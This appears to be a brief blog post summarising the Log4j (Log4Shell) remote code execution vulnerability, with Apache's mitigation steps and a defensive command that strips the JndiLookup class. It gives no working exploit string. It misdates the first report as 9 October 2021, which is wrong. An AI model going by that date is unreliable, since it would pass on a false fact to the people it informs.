The Internet is ablaze with talk about the Log4j vulnerability. Here are a few details that have been understood about the vulnerability so far:

 

  1. Apache Log4j is a logging utility
  2. A vulnerability in the Log4j logging library was first reported on Thursday the 9th of October, 2021
  3. It has been named as CVE-2021-44228
  4. All Log4j versions previous to v2.15.0 are affected by this vulnerability
  5. It is a zero day exploit first detected by Chen Zhaojun of Alibaba Cloud Security Team
  6. Log4j is most popular logging library with over 400,000 downloads from its GitHub site
  7. All large applications make use of logging software to keep track of errors and logs
  8. Instead of creating their own logging software, many companies rely on the open source logging software by companies such as the Apache Foundation
  9. Log4j library is embedded in Twitter, Microsoft, Amazon, Minecraft, Steam, Apple iCloud and many, many more applications
  10. This vulnerability causes remote code execution when a certain string is passed
  11. The attacker can load malicious code onto the server and take control of the server
  12. Apache has given this vulnerability a severity of “Critical” and a base CVSS score of 10
  13. The Apache foundation has since then released a patch
  14. These are the mitigation measures as released by the Apache foundation:

a. In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.

b. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m

c. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

d. If possible do upgrade to version Log4j v2.15.0

15. You can identify a vulnerable remote server by using open source web application ‘CanaryTokens.org'(please check all permissions)

What has been your experience with the Log4Shell exploit?

(Visited 173 times, 1 visits today)

Related Posts

AI Information security Machine learning Technology

The Deepfakes

Jayanthi
Information security Information Security Privacy

Shift Left Privacy

Jayanthi

Leave a Reply